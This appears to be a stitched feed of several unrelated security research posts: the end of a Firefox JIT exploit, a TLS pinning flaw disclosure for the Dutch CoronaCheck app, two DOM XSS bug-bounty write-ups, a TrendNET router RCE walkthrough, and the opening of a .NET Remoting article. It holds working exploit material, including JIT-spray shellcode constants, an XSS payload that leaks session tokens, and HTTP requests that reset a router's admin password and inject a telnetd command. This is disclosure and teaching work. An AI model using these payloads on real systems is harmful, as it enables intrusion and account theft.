   // Set the 5th property of the arguments object
   arg[5] = o;

   // Get the address of the 5th property
   target = ad_location + (7n * 8n) // [len][deleted][0][1][2][3][4][5] (index 7)

   // Set the fake ArrayBuffer backing store to point to this location
   target_uint32arr[14] = parseInt(target) & 0xffffffff;
   target_uint32arr[15] = parseInt(target >> 32n);

   // Read the address of the object o
   return (BigInt(fake_arrbuf[1] & 0xffff) 

Code Execution

With the primitives completed, the only thing left is to get code execution. While there’s nothing particularly new about this method, I will go over it in the interest of completeness.

Unlike Chrome, WASM regions aren’t read-write-execute (RWX) in Firefox. The common way to go about getting code execution is by performing JIT spraying. Simply put, a function containing a number of constant values is made. By executing this function repeatedly, we can cause the browser to JIT compile it. These constants then sit beside each other in a read-execute (RX) region. By changing the function’s JIT region pointer to these constants, they can be executed as if they were instructions:

/*
   shellcode - Constant values which hold our shellcode to pop xcalc.
*/
function shellcode(){
   find_me = 5.40900888e-315; // 0x41414141 in memory
   A = -6.828527034422786e-229; // 0x9090909090909090
   B = 8.568532312320605e+170;
   C = 1.4813365150669252e+248;
   D = -6.032447120847604e-264;
   E = -6.0391189260385385e-264;
   F = 1.0842822352493598e-25;
   G = 9.241363425014362e+44;
   H = 2.2104256869204514e+40;
   I = 2.4929675059396527e+40;
   J = 3.2459699498717e-310;
   K = 1.637926e-318;
}
 
/*
   main - Performs the exploit
*/
function main() {
   for(i = 0;i 

A video of the exploit can be found here.

Wrote an exploit for a very interesting Firefox bug. Gave me a chance to try some new things out!

More coming soon! pic.twitter.com/g6K9tuK4UG

— maxpl0it (@maxpl0it) February 1, 2022

Conclusion

Throughout this post we have covered a wide range of topics, such as the basics of JIT compilers in JavaScript engines, vulnerabilities from their assumptions, exploit primitive construction, and even using CodeQL to find variants of vulnerabilities.

Doing so meant that a new set of exploit primitives were found, an unexploitable variant of the vulnerability itself was identified, and a vulnerability with many caveats was exploited.

This blog post highlights the kind of research SentinelLabs does in order to identify exploitation patterns.

CoronaCheck App TLS certificate vulnerabilities

3 February 2022 at 00:00

During the pandemic a lot of software has seen an explosive growth of active users, such as the software used for working from home. In addition, completely new applications have been developed to track and handle the pandemic, like those for Bluetooth-based contact tracing. These projects have been a focus of our research recently. With projects growing this quickly or with a quick deadline for release, security is often not given the required attention. It is therefore very useful to contribute some research time to improve the security of the applications all of us suddenly depend on. Previously, we have found vulnerabilities in Zoom and Proctorio. This blog post will detail some vulnerabilities in the Dutch CoronaCheck app we found and reported. These vulnerabilities are related to the security of the connections used by the app and were difficult to exploit in practice. However, it is a little worrying to find this many vulnerabilities in an app for which security is of such critical importance.

Background

The CoronaCheck app can be used to generate a QR code proving that the user has received either a COVID-19 vaccination, has recently received a negative test result or has recovered from COVID-19. A separate app, the CoronaCheck Verifier can be used to check these QR codes. These apps are used to give access to certain locations or events, which is known in The Netherlands as “Testen voor Toegang”. They may also be required for traveling to specific countries. The app used to generate the QR code is refered to in the codebase as the Holder app to distinguish it from the Verifier app. The source code of these apps is available on Github, although active development takes place in a separate non-public repository. At certain intervals, the public source code is updated from the private repository.

The Holder app:

The Verifier app:

The verification of the QR codes uses two different methods, depending on whether the code is for use in The Netherlands or internationally. The cryptographic process is very different for each. We spent a bit of time looking at these two processes, but found no (obvious) vulnerabilities.

Then we looked at the verification of the connections set up by the two apps. Part of the configuration of the app needs to be downloaded from a server hosted by the Ministerie van Volksgezondheid, Welzijn en Sport (VWS). This is because test results are retrieved by the app directly from the test provider. This means that the Holder app needs to know which test providers are used right now, how to connect to them and the Verifier app needs to know what keys to use to verify the signatures for that test provider. The privacy aspects of this design are quite good: the test provider only knows the user retrieved the result, but not where they are using it. VWS doesn’t know who has done a test or their results and the Verifier only sees the limited personal information in the QR which is needed to check the identity of the holder. The downside of this is that blocking a specific person’s QR code is difficult.

Strict requirements were formulated for the security of these connections in the design. See here (in Dutch). This includes the use of certificate pinning to check that the certificates are issued a small set of Certificate Authorities (CAs). In addition to the use of TLS, all responses from the APIs must be signed using a signature. This uses the PKCS#7 Cryptographic Message Syntax (CMS) format.

Many of the checks on certificates that were added in the iOS app contained subtle mistakes. Combined, only one implicit check on the certificate (performed by App Transport Security) was still effective. This meant that there was no certificate pinning at all and any malicious CA could generate a certificate capable of intercepting the connections between the app and VWS or a test provider.

Certificate check issues

An iOS app that wants to handle the checking of TLS certificates itself can do so by implementing the delegate method urlSession(_:didReceive:completionHandler:). Whenever a new connection is created, this method is called allowing the app to perform its own checks. It can respond in three different ways: continue with the usual validation (performDefaultHandling), accept the certificate (useCredential) or reject the certificate (cancelAuthenticationChallenge). This function can also be called for other authentication challenges, such as HTTP basic authentication, so it is common to check that the type is NSURLAuthenticationMethodServerTrust first.

This was implemented as follows in SecurityStrategy.swift lines 203 to 262:

203func checkSSL() {
204
205    guard challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust,
206          let serverTrust = challenge.protectionSpace.serverTrust else {
207
208        logDebug("No security strategy")
209        completionHandler(.performDefaultHandling, nil)
210        return
211    }
212
213    let policies = [SecPolicyCreateSSL(true, challenge.protectionSpace.host as CFString)]
214    SecTrustSetPolicies(serverTrust, policies as CFTypeRef)
215    let certificateCount = SecTrustGetCertificateCount(serverTrust)
216
217    var foundValidCertificate = false
218    var foundValidCommonNameEndsWithTrustedName = false
219    var foundValidFullyQualifiedDomainName = false
220
221    for index in 0 ..< certificateCount {
222
223        if let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, index) {
224            let serverCert = Certificate(certificate: serverCertificate)
225
226            if let name = serverCert.commonName {
227                if name.lowercased() == challenge.protectionSpace.host.lowercased() {
228                    foundValidFullyQualifiedDomainName = true
229                    logVerbose("Host matched CN \(name)")
230                }
231                for trustedName in trustedNames {
232                    if name.lowercased().hasSuffix(trustedName.lowercased()) {
233                        foundValidCommonNameEndsWithTrustedName = true
234                        logVerbose("Found a valid name \(name)")
235                    }
236                }
237            }
238            if let san = openssl.getSubjectAlternativeName(serverCert.data), !foundValidFullyQualifiedDomainName {
239                if compareSan(san, name: challenge.protectionSpace.host.lowercased()) {
240                    foundValidFullyQualifiedDomainName = true
241                    logVerbose("Host matched SAN \(san)")
242                }
243            }
244            for trustedCertificate in trustedCertificates {
245
246                if openssl.compare(serverCert.data, withTrustedCertificate: trustedCertificate) {
247                    logVerbose("Found a match with a trusted Certificate")
248                    foundValidCertificate = true
249                }
250            }
251        }
252    }
253
254    if foundValidCertificate && foundValidCommonNameEndsWithTrustedName && foundValidFullyQualifiedDomainName {
255        // all good
256        logVerbose("Certificate signature is good for \(challenge.protectionSpace.host)")
257        completionHandler(.useCredential, URLCredential(trust: serverTrust))
258    } else {
259        logError("Invalid server trust")
260        completionHandler(.cancelAuthenticationChallenge, nil)
261    }
262}

If an app wants to implement additional verification checks, then it is common to start with performing the platform’s own certificate validation. This also means that the certificate chain is resolved. The certificates received from the server may be incomplete or contain additional certificates, by applying the platform verification a chain is constructed ending in a trusted root (if possible). An app that uses a private root could also do this, but while adding the root as the only trust anchor.

This leads to the first issue with the handling of certificate validation in the CoronaCheck app: instead of giving the “continue with the usual validation” result, the app would accept the certificate if its own checks passed (line 257). This meant that the checks are not additions to the verification, but replace it completely. The app does implicitly perform the platform verification to obtain the correct chain (line 215), but the result code for the validation was not checked, so an untrusted certificate was not rejected here.

The app performs 3 additional checks on the certificate:

  • It is issued by one of a list of root certificates (line 246).
  • It contains a Subject Alternative Name containing a specific domain (line 238).
  • It contains a Common Name containing a specific domain (lines 227 and 232).

For checking the root certificate the resolved chain is used and each certificate is compared to a list of certificates hard-coded in the app. This set of roots depends on what type of connection it is. Connections to the test providers are a bit more lenient, while the connection to the VWS servers itself needs to be issued by a specific root.

This check had a critical issue: the comparison was not based on unforgeable data. Comparing certificates properly could be done by comparing them byte-by-byte. Certificates are not very large, this comparison would be fast enough. Another option would be to generate a hash of both certificates and compare those. This could speed up repeated checks for the same certificate. The implemented comparison of the root certificate was based on two checks: comparing the serial number and comparing the “authority key information” extension fields. For trusted certificates, the serial number must be randomly generated by the CA. The authority key information field is usually a hash of the certificate’s issuer’s key, but this can be any data. It is trivial to generate a self-signed certificate with the same serial number and authority key information field as an existing certificate. Combine this with the previous item and it is possible to generate a new, self-signed certificate that is accepted by the TLS verification of the app.

OpenSSL.m lines 144 to 227:

144- (BOOL)compare:(NSData *)certificateData withTrustedCertificate:(NSData *)trustedCertificateData {
145
146	BOOL subjectKeyMatches = [self compareSubjectKeyIdentifier:certificateData with:trustedCertificateData];
147	BOOL serialNumbersMatches = [self compareSerialNumber:certificateData with:trustedCertificateData];
148	return subjectKeyMatches && serialNumbersMatches;
149}
150
151- (BOOL)compareSubjectKeyIdentifier:(NSData *)certificateData with:(NSData *)trustedCertificateData {
152
153	const ASN1_OCTET_STRING *trustedCertificateSubjectKeyIdentifier = NULL;
154	const ASN1_OCTET_STRING *certificateSubjectKeyIdentifier = NULL;
155	BIO *certificateBlob = NULL;
156	X509 *certificate = NULL;
157	BIO *trustedCertificateBlob = NULL;
158	X509 *trustedCertificate = NULL;
159	BOOL isMatch = NO;
160
161	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
162		EXITOUT("Cannot allocate certificateBlob");
163
164	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
165		EXITOUT("Cannot parse certificateData");
166
167	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
168		EXITOUT("Cannot allocate trustedCertificateBlob");
169
170	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
171		EXITOUT("Cannot parse trustedCertificate");
172
173	if (NULL == (trustedCertificateSubjectKeyIdentifier = X509_get0_subject_key_id(trustedCertificate)))
174		EXITOUT("Cannot extract trustedCertificateSubjectKeyIdentifier");
175
176	if (NULL == (certificateSubjectKeyIdentifier = X509_get0_subject_key_id(certificate)))
177		EXITOUT("Cannot extract certificateSubjectKeyIdentifier");
178
179	isMatch = ASN1_OCTET_STRING_cmp(trustedCertificateSubjectKeyIdentifier, certificateSubjectKeyIdentifier) == 0;
180
181errit:
182	BIO_free(certificateBlob);
183	BIO_free(trustedCertificateBlob);
184	X509_free(certificate);
185	X509_free(trustedCertificate);
186
187	return isMatch;
188}
189
190- (BOOL)compareSerialNumber:(NSData *)certificateData with:(NSData *)trustedCertificateData {
191
192	BIO *certificateBlob = NULL;
193	X509 *certificate = NULL;
194	BIO *trustedCertificateBlob = NULL;
195	X509 *trustedCertificate = NULL;
196	ASN1_INTEGER *certificateSerial = NULL;
197	ASN1_INTEGER *trustedCertificateSerial = NULL;
198	BOOL isMatch = NO;
199
200	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
201		EXITOUT("Cannot allocate certificateBlob");
202
203	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
204		EXITOUT("Cannot parse certificate");
205
206	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
207		EXITOUT("Cannot allocate trustedCertificateBlob");
208
209	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
210		EXITOUT("Cannot parse trustedCertificate");
211
212	if (NULL == (certificateSerial = X509_get_serialNumber(certificate)))
213		EXITOUT("Cannot parse certificateSerial");
214
215	if (NULL == (trustedCertificateSerial = X509_get_serialNumber(trustedCertificate)))
216		EXITOUT("Cannot parse trustedCertificateSerial");
217
218	isMatch = ASN1_INTEGER_cmp(certificateSerial, trustedCertificateSerial) == 0;
219
220errit:
221	if (certificateBlob) BIO_free(certificateBlob);
222	if (trustedCertificateBlob) BIO_free(trustedCertificateBlob);
223	if (certificate) X509_free(certificate);
224	if (trustedCertificate) X509_free(trustedCertificate);
225
226	return isMatch;
227}

This combination of issues may sound like TLS validation was completely broken, but luckily there was a safety net. In iOS 9, Apple introduced a mechanism called App Transport Security (ATS) to enforce certificate validation on connections. This is used to enforce the use of secure and trusted HTTPS connections. If an app wants to use an insecure connection (either plain HTTP or HTTPS with certificates not issued by a trusted root), it needs to specifically opt-in to that in its Info.plist file. This creates something of a safety net, making it harder to accidentally disable TLS certificate validation due to programming mistakes.

ATS was enabled for the CoronaCheck apps without any exceptions. This meant that our untrusted certificate, even though accepted by the app itself, was rejected by ATS. This meant we couldn’t completely bypass the certificate validation. This could however still be exploitable in these scenarios:

  • A future update for the app could add an ATS exception or an update to iOS might change the ATS rules. Adding an ATS exception is not as unrealistic as it may sound: the app contains a trusted root that is not included in the iOS trust store (“Staat der Nederlanden Private Root CA - G1”). To actually use that root would require an ATS exception.
  • A malicious CA could issue a certificate using the serial number and authority key information of one of the trusted certificates. This certificate would be accepted by ATS and pass all checks. A reliable CA would not issue such a certificate, but it does mean that the certificate pinning that was part of the requirements was not effective.

Other issues

We found a number of other issues in the verification of certificates. These are of lower impact.

Subject Alternative Names

In the past, the Common Name field was used to indicate for which domain a certificate was for. This was inflexible, because it meant each certificate was only valid for one domain. The Subject Alternative Name (SAN) extension was added to make it possible to add more domain names (or other types of names) to certificates. To correctly verify if a certificate is valid for a domain, the SAN extension has to be checked.

Obtaining the SANs from a certificates was implemented by using OpenSSL to generate a human-readable representation of the SAN extension and then parsing that. This did not take into account the possibility of other name types than a domain name, such as an email addresses in a certificate used for S/MIME. The parsing could be confused using specifically formatted email addresses to make it match any domain name.

SecurityStrategy.swift lines 114 to 127:

114func compareSan(_ san: String, name: String) -> Bool {
115
116    let sanNames = san.split(separator: ",")
117    for sanName in sanNames {
118        // SanName can be like DNS: *.domain.nl
119        let pattern = String(sanName)
120            .replacingOccurrences(of: "DNS:", with: "", options: .caseInsensitive)
121            .trimmingCharacters(in: .whitespacesAndNewlines)
122        if wildcardMatch(name, pattern: pattern) {
123            return true
124        }
125    }
126    return false
127}

For example, an S/MIME certificate containing the email address "a,*,b"@example.com (which is a valid email address) would result in a wildcard domain (*) that matches all hosts.

CMS signatures

The domain name check for the certificate used to generate the CMS signature of the response did not compare the full domain name, instead it checked that a specific string occurred in the domain (coronacheck.nl) and that it ends with a specific string (.nl). This means that an attacker with a certificate for coronacheck.nl.example.nl could also CMS sign API responses.

OpenSSL.m lines 259 to 278:

259- (BOOL)validateCommonNameForCertificate:(X509 *)certificate
260                         requiredContent:(NSString *)requiredContent
261                          requiredSuffix:(NSString *)requiredSuffix {
262    
263    // Get subject from certificate
264    X509_NAME *certificateSubjectName = X509_get_subject_name(certificate);
265    
266    // Get Common Name from certificate subject
267    char certificateCommonName[256];
268    X509_NAME_get_text_by_NID(certificateSubjectName, NID_commonName, certificateCommonName, 256);
269    NSString *cnString = [NSString stringWithUTF8String:certificateCommonName];
270    
271    // Compare Common Name to required content and required suffix
272    BOOL containsRequiredContent = [cnString rangeOfString:requiredContent options:NSCaseInsensitiveSearch].location != NSNotFound;
273    BOOL hasCorrectSuffix = [cnString hasSuffix:requiredSuffix];
274    
275    certificateSubjectName = NULL;
276    
277    return hasCorrectSuffix && containsRequiredContent;
278}

The only issue we found on the Android implementation is similar: the check for the CMS signature used a regex to check the name of the signing certificate. This regex was not bound on the right, making also possible to bypass it using coronacheck.nl.example.com.

SignatureValidator.kt lines 94 to 96:

94fun cnMatching(substring: String): Builder {
95    return cnMatching(Regex(Regex.escape(substring)))
96}

SignatureValidator.kt line 142 to 149:

if (cnMatchingRegex != null) {
    if (!JcaX509CertificateHolder(signingCertificate).subject.getRDNs(BCStyle.CN).any {
            val cn = IETFUtils.valueToString(it.first.value)
            cnMatchingRegex.containsMatchIn(cn)
        }) {
        throw SignatureValidationException("Signing certificate does not match expected CN")
    }
}

Because these certificates had to be issued by PKI-Overheid (a CA run by the Dutch government) certificate, it might not have been easy to obtain a certificate with such a domain name.

Race condition

We also found a race condition in the application of the certificate validation rules. As we mentioned, the rules the app applied for certificate validation were more strict for VWS connections than for connections to test providers, and even for connections to VWS there were different levels of strictness. However, if two requests were performed quickly after another, the first request could be validated based on the verification rules specified for the second request. In practice, the least strict verification rules still require a valid certificate, so this can not be used to intercept connections either. However, it was already triggering in normal use, as the app was initiating two requests with different validation rules immediately after starting.

Reporting

We reported these vulnerabilities to the email address on the “Kwetsbaarheid melden” (Report a vulnerability) page on June 30th, 2021. This email bounced because the address did not exist. We had to reach out through other channels to find a working address. We received an acknowledgement that the message was received, but no further updates. The vulnerabilities were fixed quietly, without letting us know that they were fixed.

In October we decided to look at the code on GitHub to check if all issues were resolved correctly. While most issues were fixed, one was not fixed properly. We sent another email detailing this issue. This was again fixed without informing us.

Developers are of course not required to keep us in the loop of the if we report a vulnerability, but this does show that if they had, we could have caught the incorrect fix much earlier.

Recommendation

TLS certificate validation is a complex process. This case demonstrates that adding more checks is not always better, because they might interfere with the normal platform certificate validation. We recommend changing the certificate validation process only if absolutely necessary. Any extra checks should have a clear security goal. Checks such as “the domain must contain the string …” (instead of “must end with …”) have no security benefit and should be avoided.

Certificate pinning not only has implementation challenges, but also operational challenges. If a certificate renewal has not been properly planned, then it may leave an app unable to connect. This is why we usually recommend pinning only for applications handling very sensitive user data. Other checks can be implemented to address the risk of a malicious or compromised CA with much less chance of problems, for example checking the revocation and Certificate Transparency status of a certificate.

Conclusion

We found and reported a number of issues in the verification of TLS certificates used for the connections of the Dutch CoronaCheck apps. These vulnerabilities could have been combined to bypass certificate pinning in the app. In most cases, this could only be abused by a compromised or malicious CA or if a specific CA could be used to issue a certificate for a certain domain. These vulnerabilities have since then been fixed.

Solving DOM XSS Puzzles

3 February 2022 at 00:05

DOM-based Cross-site scripting (XSS) vulnerabilities rank as one of my favourite vulnerabilities to exploit. It's a bit like solving a puzzle; sometimes you get a corner piece like $.html(), other times you have to rely on trial-and-error. I recently encountered two interesting postMessage DOM XSS vulnerabilities in bug bounty programs that scratched my puzzle-solving itch.

Note: Some details have been anonymized.

Puzzle A: The Postman Problem

postMessage emerged in recent years as a common source of XSS bugs. As developers moved to client-side JavaScript frameworks, classic server-side rendered XSS vulnerabilities disappeared. Instead, frontends used asynchronous communication streams such as postMessage and WebSockets to dynamically modify content.

I keep an eye out for postMessage calls with Frans Rosén's postmessage-tracker tool. It's a Chrome extension that helpfully alerts you whenever it detects a postMessage call and enumerates the path from source to sink. However, while postMessage calls abound, most tend to be false positives and require manual validation.

While browsing Company A’s website at https://feedback.companyA.com/, postmessage-tracker notified me of a particularly interesting call originating from an iFrame https://abc.cloudfront.net/iframe_chat.html:

window.addEventListener("message", function(e) {
...
    } else if (e.data.type =='ChatSettings') {
         if (e.data.iframeChatSettings) {
             window.settingsSync =  e.data.iframeChatSettings;
...

The postMessage handler checked if the message data (e.data) contained a type value matching ChatSettings. If so, it set window.settingsSync to e.data.iframeChatSettings. It did not perform any origin checks – always a good sign for bug hunters since the message could be sent from any attacker-controled domain.

What was window.settingsSync used for? By searching for this string in Burp, I discovered https://abc.cloudfront.net/third-party.js:

else if(window.settingsSync.environment == "production"){
  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'
}
var url = domain+'/public/ext_data'

request.open('POST', url, true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.onload = function () {
  if (request.status == 200) {
    var data = JSON.parse(this.response);
...
    window.settingsSync = data;
...
    var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js';
    loadScript(document, newScript);

If window.settingsSync.environment == "production”, window.settingsSync.region would be rearranged into subdomain and inserted into domain = 'https://'+subdomain+'.settingsSync.com. This URL would then be used in a POST request. The response would be parsed as a JSON and set window.settingsSync. Next, window.settingsSync.versionNumber was used to construct a URL that loaded a new JavaScript file var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js'.

In a typical scenario, the page would load https://abc.cloudfront.net/module-v2.js:

config = window.settingsSync.config;
…
eval("window.settingsSync.configs."+config)

Aha! eval was a simple sink that executed its string argument as JavaScript. If I controlled config, I could execute arbitrary JavaScript!

However, how could I manipulate domain to match my malicious server instead of *.settingsSync.com? I inspected the code again:

  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'

I noticed that due to insufficient sanitisation and simple concatenation, a window.settingsSync.region value like .my.website/malicious.php?_bad would be rearranged into https://bad-.my.website/malicious.php?.settingsSync.com! Now domain pointed to bad-.my.website, a valid attacker-controlled domain served a malicious payload to the POST request.

Diagram 1

I created malicious.php on my server to send a valid response by capturing the responses from the origin target. I modified the name of the selected config to my XSS payload:

<?php
$origin = $_SERVER['HTTP_ORIGIN'];
header('Access-Control-Allow-Origin: ' . $origin);
header('Access-Control-Allow-Headers: cache-control');
header("Content-Type: application/json; charset=UTF-8");

echo '{
    "versionNumber": "2",
    "config": “a;alert()//“,
    "configs": {
        "a": "a"
    }
    ...
}'
?>

Based on this response, the sink would now execute:

eval("window.settingsSync.configs.a;alert()//”)

From my own domain, I spawned the page containing the vulnerable iFrame with var child = window.open("https://feedback.companyA.com/"), then sent the PostMessage payload with child.frames[1].postMessage(...). With that, the alert box popped!

However, I still needed one final piece. Since the XSS executed in the context of an iFrame https://abc.cloudfront.net/iframe_chat.html instead of https://feedback.companyA.com/, there was no actual impact; it was as good as executing XSS on an external domain. I needed to somehow leverage this XSS in the iFrame to reach the parent window https://feedback.companyA.com/.

Thankfully, https://feedback.companyA.com/ included yet another interesting postMessage handler:

    }, d = document.getElementById("iframeChat"), window.addEventListener("message", function(m) {
        var e;
        "https://abc.cloudfront.net" === m.origin && ("IframeLoaded" == m.data.type && d.contentWindow.postMessage({
            type: "credentialConfig",
            credentialConfig: credentialConfig
        }, "*"))

https://feedback.companyA.com/ created a PostMessage listener that validated the message origin as https://abc.cloudfront.net. If the message data type was IframeLoaded, it sent a PostMessage back with credentialConfig data.

credentialConfig included a session token:

{
    "region": "en-uk",
    "environment": "production",
    "userId": "<USERID>",
    "sessionToken": "Bearer <SESSIONTOKEN>"
}

Thus, by sending the PostMessage to trigger an XSS on https://abc.cloudfront.net/iframe_chat.html, the XSS would then run arbitrary JavaScript that sent another PostMessage from https://abc.cloudfront.net/iframe_chat.html to https://feedback.companyA.com/ which would leak the session token.

Based on this, I modified the XSS payload:

{
    "versionNumber": "2",
    "config": "a;window.addEventListener(`message`, (event) => {alert(JSON.stringify(event.data))});parent.postMessage({type:`IframeLoaded`},`*`)//",
    "configs": {
        "a": "a
    }
}

The XSS received the session data from the parent iFrame on https://feedback.companyA.com/ and exfiltrated the stolen sessionToken to an attacker-controlled server (I simply used alert here).

Puzzle B: Bypassing CSP with Newline Open Redirect

While exploring the OAuth flow of Company B, I noticed something strange about its OAuth authorization page. Typically, OAuth authorization pages present some kind of confirmation button to link an account. For example, here's Twitter's OAuth authorization page to login to GitLab:

OAuth Login

Company B's page used a URL with the following format: https://accept.companyb/confirmation?domain=oauth.companyb.com&state=<STATE>&client=<CLIENT ID>. Once the page was loaded, it would dynamically send a GET request to oauth.companyb.com/oauth_data?clientID=<CLIENT ID>. This returned some data to populate the page's contents:

{
    "app": {
        "logoUrl": <PAGE LOGO URL>,
        "name": <NAME>,
        "link": <URL> ,
        "introduction": "A cool app!"
        ...
    }
}

By playing around with this response data, I realised that introduction was injected into the page without any sanitisation. If I could control the destination of the GET request and subsequently the response, it would be possible to cause an XSS.

Fortunately, it appeared that the domain parameter allowed me to control the domain of the GET request. However, when I set this to my own domain, the request failed to execute and raised a Content Security Policy (CSP) error. I quickly checked the CSP of the page:

Content-Security-Policy: default-src 'self' 'unsafe-inline' *.companyb.com *.amazonaws.com; script-src 'self' https: *.companyb.com; object-src 'none';

When dynamic HTTP requests are made, they adhere to the connect-src CSP rule. In this case, the default-src rule meant that only requests to *.companyb.com and *.amazonaws.com were allowed. Unfortunately for the company, *.amazonaws.com created a big loophole: since AWS S3 files are hosted on *.s3.amazonaws.com, I could still send requests to my attacker-controlled bucket! Furthermore, CORS would not be an issue as AWS allows users to set the CORS policies of buckets.

I quickly hosted a JSON file with text as <script>alert()</script> on https://myevilbucket.s3.amazonaws.com/oauth_data.json, then browsed to https://accept.companyb/confirmation?domain=myevilbucket.s3.amazonaws.com%2f payload.json%3F&state=<STATE>&client=<CLIENT ID>. The page successfully requested my file at https://myevilbucket.s3.amazonaws.com/payload.json?/oauth_data?clientID=<CLIENT ID>, then... nothing.

One more problem remained: the CSP for script-src only allowed for self or *.companyb.com for HTTPS. Luckily, I had an open redirect on t.companyb.com saved for such situations. The vulnerable endpoint would redirect to the value of the url parameter but validate if the parameter ended in companyb.com. However, it allowed a newline character %0A in the subdomain section, which would be truncated by browsers such that http://t.companyb.com/redirect?url=http%3A%2F%2Fevil.com%0A.companyb.com%2F actually redirected to https://evil.com/%0A.companyb.com/ instead.

By using this bypass to create an open redirect, I saved my final XSS payload in <NEWLINE CHARACTER>.companyb.com in my web server's document root. I then injected a script tag with src pointing to the open redirect which passed the CSP but eventually redirected to the final payload.

Diagram 2

Conclusion

Both companies awarded bonuses for my XSS reports due to their complexity and ability to bypass hardened execution environments. I hope that by documenting my thought processes, you can also gain a few extra tips to solve DOM XSS puzzles.

TrendNET AC2600 RCE via WAN

31 January 2022 at 14:03

This blog provides a walkthrough of how to gain RCE on the TrendNET AC2600 (model TEW-827DRU specifically) consumer router via the WAN interface. There is currently no publicly available patch for these issues; therefore only a subset of issues disclosed in TRA-2021–54 will be discussed in this post. For more details regarding other security-related issues in this device, please refer to the Tenable Research Advisory.

In order to achieve arbitrary execution on the device, three flaws need to be chained together: a firewall misconfiguration, a hidden administrative command, and a command injection vulnerability.

The first step in this chain involves finding one of the devices on the internet. Many remote router attacks require some sort of management interface to be manually enabled by the administrator of the device. Fortunately for us, this device has no such requirement. All of its services are exposed via the WAN interface by default. Unfortunately for us, however, they’re exposed only via IPv6. Due to an oversight in the default firewall rules for the device, there are no restrictions made to IPv6, which is enabled by default.

Once a device has been located, the next step is to gain administrative access. This involves compromising the admin account by utilizing a hidden administrative command, which is available without authentication. The “apply_sec.cgi” endpoint contains a hidden action called “tools_admin_elecom.” This action contains a variety of methods for managing the device. Using this hidden functionality, we are able to change the password of the admin account to something of our own choosing. The following request demonstrates changing the admin password to “testing123”:

POST /apply_sec.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/setup_wizard.asp
Cookie: compact_display_state=false
Upgrade-Insecure-Requests: 1
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=testing123

The third and final flaw we need to abuse is a command injection vulnerability in the syslog functionality of the device. If properly configured, which it is by default, syslogd spawns during boot. If a malformed parameter is supplied in the config file and the device is rebooted, syslogd will fail to start.

When visiting the syslog configuration page (adm_syslog.asp), the backend checks to see if syslogd is running. If not, an attempt is made to start it, which is done by a system() call that accepts user controllable input. This system() call runs input from the cameo.cameo.syslog_server parameter. We need to somehow stop the service, supply a command to be injected, and restart the service.

The exploit chain for this vulnerability is as follows:

  1. Send a request to corrupt syslog command file and change the cameo.cameo.syslog_server parameter to contain an injected command
  2. Reboot the device to stop the service (possible via the web interface or through a manual request)
  3. Visit the syslog config page to trigger system() call

The following request will both corrupt the configuration file and supply the necessary syslog_server parameter for injection. Telnetd was chosen as the command to inject.

POST /apply.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 363
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/adm_syslog.asp
Cookie: compact_display_state=false
ccp_act=set&html_response_return_page=adm_syslog.asp&action=tools_syslog&reboot_type=application&cameo.cameo.syslog_server=1%2F192.168.1.1:1234%3btelnetd%3b&cameo.log.enable=1&cameo.log.server=break_config&cameo.log.log_system_activity=1&cameo.log.log_attacks=1&cameo.log.log_notice=1&cameo.log.log_debug_information=1&1629923014463=1629923014463

Once we reboot the device and re-visit the syslog configuration page, we’ll be able to telnet into the device as root.

Since IPv6 raises the barrier of entry in discovering these devices, we don’t expect widespread exploitation. That said, it’s a pretty simple exploit chain that can be fully automated. Hopefully the vendor releases patches publicly soon.


TrendNET AC2600 RCE via WAN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

.NET Remoting Revisited

27 January 2022 at 14:49

.NET Remoting is the built-in architecture for remote method invocation in .NET. It is also the origin of the (in-)famous BinaryFormatter and SoapFormatter serializers and not just for that reason a promising target to watch for.

This blog post attempts to give insights into its features, security measures, and especially its weaknesses/vulnerabilities that often result in remote code execution. We're also introducing major additions to the ExploitRemotingService tool, a new ObjRef gadget for YSoSerial.Net, and finally a RogueRemotingServer as counterpart to the ObjRef gadget.

If you already understand the internal of .NET Remoting, you may skip the introduction and proceed right with Security Features, Pitfalls, and Bypasses.

Introduction

.NET Remoting is deeply integrated into the .NET Framework and allows invocation of methods across so called remoting boundaries. These can be different app domains within a single process, different processes on the same computer, or different processes on different computers. Supported transports between the client and server are HTTP, IPC (named pipes), and TCP.

